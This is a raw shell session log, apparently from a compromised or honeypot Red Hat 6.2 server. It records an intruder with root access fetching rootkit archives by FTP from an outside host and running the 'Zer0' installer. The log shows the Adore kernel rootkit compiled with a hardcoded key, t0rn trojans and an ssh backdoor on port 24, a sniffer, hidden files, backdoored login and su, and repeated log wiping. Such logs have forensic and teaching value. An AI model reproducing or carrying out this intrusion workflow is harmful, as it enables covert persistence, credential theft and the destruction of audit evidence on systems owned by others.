Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586

login: nobody
Last login: Sun Sep 16 04:32:21 from 217.156.93.166
sh: ulimit: cannot modify limit: Operation not permitted
sh-2.03$ su dns
nobody@ns1: /[root@ns1 /]# w
  4:49am  up 3 days, 10:57,  1 user,  load average: 0.00, 0.00, 0.04
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
nobody   pts/0    217.156.93.166    4:49am  0.00s  1.02s  ?     -
nobody@ns1: /[root@ns1 /]# cd cd /tmp
nobody@ns1: /tmp[root@ns1 /tmp]# mc -s
bash: mc: command not found
nobody@ns1: /tmp[root@ns1 /tmp]# f ftp teleport. cd /dev/rd
nobody@ns1: /dev/rd[root@ns1 rd]# ftp teleport.go.ro
nobody@ns1: /dev/rd[root@ns1 rd]#
nobody@ns1: /dev/rd[root@ns1 rd]#
nobody@ns1: /dev/rd[root@ns1 rd]# mkdir sdc0
nobody@ns1: /dev/rd[root@ns1 rd]# cd sdc0
nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# ls
nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# lscd sdc0[4hmkd[4lir sdc0ftp teleport.go.ro
Connected to teleport.go.ro.
220-
220-
220-           H O M E . R O
220-
220- This server is for HOME.RO members only.
220- Go to http://www.home.ro/ to register.
220-
220- No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) [193.231.236.42]
Name (teleport.go.ro:nobody): teleport
331 Password required for teleport.
Password:
230 User teleport logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd new
250 CWD command successful.
ftp> get Zer0.tar.gz
local: Zer0.tar.gz remote: Zer0.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes).
226 Transfer complete.
139711 bytes received in 7.76 secs (18 Kbytes/sec)
ftp> by get copy.tar.gz
local: copy.tar.gz remote: copy.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes).
226 Transfer complete.
265189 bytes received in 14.6 secs (18 Kbytes/sec)
ftp> get ooty.tar.gz
local: ooty.tar.gz remote: ooty.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes).
226 Transfer complete.
14847 bytes received in 0.856 secs (17 Kbytes/sec)
ftp> bye
221 Goodbye.
nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# tar zxvf Zer0.tar.gz
Zer0/
tar: Archive contains future timestamp 2001-09-16 20:26:34
Zer0/Go
Zer0/ssh.tgz
Zer0/tls.tgz
Zer0/adr.tgz
Zer0/adr2.tgz
tar: Archive contains future timestamp 2001-09-16 20:27:45
Zer0/adore.h
nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# ./Zer0/[1P[1P[4hc[4l[4hd[4l[4h [4l
nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# ls
Go  adore.h  adr.tgz  adr2.tgz  ssh.tgz  tls.tgz
nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# ./ ./Go 24
syslogd: no process killed
====================================================================
.oooo. oooo o8o . .o8 d8P''Y8b '888 ''' .o8 .o888oo 888 888 oooo d8b ooo. .oo. 888 oooo oooo .o888oo 888 888 888 '888''8P '888P'Y88b 888 .8P' '888 888 888 888 888 888 888 888 888888. 888 888 888 . '88b d88' 888 888 888 888 '88b. 888 888 . '888' 'Y8bd8P' d888b o888o o888o o888o o888o o888o '888'
Modificat de mine... Viruzzel
====================================================================
backdooring started on ns1
#
#
#
#
checking for remote logging...
holy guacamole batman
${RED} REMOTE LOGGING DETECTED ${RES}
${WHI} I hope you can get to these other computer(s): ${RES}
000.000.00.000
${WHI} cuz this computer is LOGGING to it... ${RES}
--------------------------------------------------------------------
# [Droping files...]
--------------------------------------------------------------------
nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# exit
.t0rn/
.t0rn/shhk
.t0rn/shrs
.t0rn/shhk.pub
.t0rn/shsml
.t0rn/sharsed
.t0rn/shdcf2
.t0rn/shhash
EOT
CVS/
CVS/Root
CVS/Repository
CVS/Entries
CVS/Tag
Makefile.gen
tar: Archive contains future timestamp 2029-09-09 09:05:12
adore.c
adore.h
ava.c
cleaner.c
cnfad
dummy.c
libinvisible.c
libinvisible.h
pass
rename.c
stad
lgstrip
nscd.init
patch
vrssb
vrssnf
vrssnk
--------------------------------------------------------------------
# [Installing trojans...]
--------------------------------------------------------------------
# Using ssh-port : 24
--------------------------------------------------------------------
[System Information...]
--------------------------------------------------------------------
Hostname : ns1 (192.168.1.102)
Arch : i586 -+- bogomips : 187.19
' Alternative IP : 127.0.0.1 -+- Might be [ 1 ] active adapters.
Distribution: Red Hat Linux release 6.2 (Zoot)
--------------------------------------------------------------------
ipchains ...?
--------------------------------------------------------------------
Chain input (policy ACCEPT):
--------------------------------------------------------------------
# [Searching for Make, gcc...]
--------------------------------------------------------------------
Make found!
gcc found!
--------------------------------------------------------------------
# [Installing adore...]
--------------------------------------------------------------------
Starting adore configuration ...
Checking 4 ELITE_UID ... found 30
Checking 4 ELITE_CMD ... using 107613
Checking 4 SMP ... NO
Checking 4 MODVERSIONS ... YES
Checking for kgcc ... found cc
Checking 4 insmod ... found /sbin/insmod -- OK
Loaded modules:
lockd                  31592   1 (autoclean)
sunrpc                 53540   1 (autoclean) [lockd]
pcnet32                10692   1 (autoclean)
Since version 0.33 Adore requires 'authentication' for its services.
You will be prompted for a password now and this password will be compiled into 'adore' and 'ava' so no further actions by you are required.
This procedure will save adore from scanners.
Try to choose a unique name that won't clash with normal calls to mkdir(2).
Password (echoed):labutza
Preparing /usr/X11R6/bin/.,/copy/adr (== cwd) for hiding ...
Creating Makefile ...
*** Edit adore.h for the hidden services and redirected file-access ***
cp: Makefile: No such file or directory
make: *** Warning: File `adore.c' has modification time in the future (2029-09-09 09:05:12 > 2001-09-16 05:02:21)
rm -f adore.o
cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS adore.c -o adore.o
adore.c:484: warning: `/*' within comment
cc -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS ava.c libinvisible.c -o ava
cc -I/usr/src/linux/include -c -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS cleaner.c
make: *** Warning: Clock skew detected. Your build may be incomplete.
ava found... proceeding!
sniffer running!
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/usr/X11R6/bin/.,' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/usr/info/.t0rn' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/dev/rd/sdc0' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/dev/rd/nscd.init' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/etc/rc.d/rc3.d/S50inet' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/usr/X11R6/lib/X11/.~' hided.
done hiding...
--------------------------------------------------------------------
# [hmmm...nothing to worry about, for you, hehehe...]
--------------------------------------------------------------------
USE this file for testing purposes ONLY ... tested on RH6.2
Login backdooring started ...
Step 1: Setting login parameters ...                        [ OK ]
Step 2: Setting su parameters ...                           [ OK ]
Step 3: Creating config files ...                           [ OK ]
Done??!!?hmmm.. who knows... :P I DO! hihihi
--------------------------------------------------------------------
# [Removing unnecessary files.. cleaning...]
--------------------------------------------------------------------
* sauber by socked [13.03.2k+1]
*
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...0 lines removed!
* Cleaning boot.log.1 (133 lines)...0 lines removed!
* Cleaning cron (8 lines)...0 lines removed!
* Cleaning cron.1 (599 lines)...0 lines removed!
* Cleaning dmesg (70 lines)...0 lines removed!
* Cleaning htmlaccess.log (0 lines)...0 lines removed!
* Cleaning maillog (0 lines)...0 lines removed!
* Cleaning maillog.1 (24 lines)...0 lines removed!
* Cleaning messages (0 lines)...0 lines removed!
* Cleaning messages.1 (383 lines)...6 lines removed!
* Cleaning netconf.log (0 lines)...0 lines removed!
* Cleaning secure (0 lines)...0 lines removed!
* Cleaning secure.1 (52 lines)...10 lines removed!
* Cleaning sendmail.st (0 lines)...-1 lines removed!
* Cleaning spooler (0 lines)...0 lines removed!
* Cleaning spooler.1 (0 lines)...0 lines removed!
* Cleaning xferlog (0 lines)...0 lines removed!
* Cleaning xferlog.1 (0 lines)...0 lines removed!
syslogd: no process killed
* Alles sauber mein Meister !'Q%&@
* sauber by socked [13.03.2k+1]
*
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...0 lines removed!
* Cleaning boot.log.1 (133 lines)...0 lines removed!
* Cleaning cron (8 lines)...0 lines removed!
* Cleaning cron.1 (599 lines)...0 lines removed!
* Cleaning dmesg (70 lines)...0 lines removed!
* Cleaning htmlaccess.log (0 lines)...0 lines removed!
* Cleaning maillog (0 lines)...0 lines removed!
* Cleaning maillog.1 (24 lines)...0 lines removed!
* Cleaning messages (0 lines)...0 lines removed!
* Cleaning messages.1 (377 lines)...1 lines removed!
* Cleaning netconf.log (0 lines)...0 lines removed!
* Cleaning secure (0 lines)...0 lines removed!
* Cleaning secure.1 (42 lines)...26 lines removed!
* Cleaning sendmail.st (1 lines)...0 lines removed!
* Cleaning spooler (0 lines)...0 lines removed!
* Cleaning spooler.1 (0 lines)...0 lines removed!
* Cleaning xferlog (0 lines)...0 lines removed!
* Cleaning xferlog.1 (0 lines)...0 lines removed!
syslogd: no process killed
* Alles sauber mein Meister !'Q%&@
* sauber by socked [13.03.2k+1]
*
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...0 lines removed!
* Cleaning boot.log.1 (133 lines)...0 lines removed!
* Cleaning cron (8 lines)...0 lines removed!
* Cleaning cron.1 (599 lines)...0 lines removed!
* Cleaning dmesg (70 lines)...0 lines removed!
* Cleaning htmlaccess.log (0 lines)...0 lines removed!
* Cleaning maillog (0 lines)...0 lines removed!
* Cleaning maillog.1 (24 lines)...0 lines removed!
* Cleaning messages (0 lines)...0 lines removed!
* Cleaning messages.1 (376 lines)...0 lines removed!
* Cleaning netconf.log (0 lines)...0 lines removed!
* Cleaning secure (0 lines)...0 lines removed!
* Cleaning secure.1 (16 lines)...0 lines removed!
* Cleaning sendmail.st (1 lines)...0 lines removed!
* Cleaning spooler (0 lines)...0 lines removed!
* Cleaning spooler.1 (0 lines)...0 lines removed!
* Cleaning xferlog (0 lines)...0 lines removed!
* Cleaning xferlog.1 (0 lines)...0 lines removed!
syslogd: no process killed
* Alles sauber mein Meister !'Q%&@
--------------------------------------------------------------------
# [Linking /bin/.bash_history, adjusting time...]
--------------------------------------------------------------------
====================================================================
HIHIHI.. CICA GATA.. AM TERMINAT!!
Zer0... by Viruzzel
====================================================================
nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# exit
sh-2.03$